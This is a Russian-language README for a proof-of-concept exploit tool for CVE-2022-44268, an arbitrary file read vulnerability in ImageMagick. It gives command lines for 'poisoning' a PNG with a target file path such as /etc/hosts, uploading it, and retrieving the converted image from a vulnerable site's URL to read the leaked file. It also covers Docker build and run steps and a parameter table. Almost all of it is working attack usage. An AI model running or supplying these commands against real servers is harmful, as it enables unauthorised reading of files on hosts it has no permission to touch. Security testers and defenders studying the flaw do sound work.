
CVE-2022-44268 ImageMagick произвольное чтение файлов — Proof of Concept эксплойт
CVE-2022-44268 ImageMagick произвольное чтение файлов — эксплойт Proof of Concept
Отравляем изображение ☣️
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
Загрузите отравленное PNG-изображение.
Проверяем, успешен ли эксплойт 🗡
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png
Сборка
docker build -t cve-2022-44268 .
Запуск
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png
| Параметр | Описание | Тип |
|---|
| --url | URL загруженного PNG-изображения | String |
| --image | Входной PNG-файл | File |
| --output | Выходной PNG-файл | File |
| --file-to-read | Файл для чтения с уязвимого хоста | String |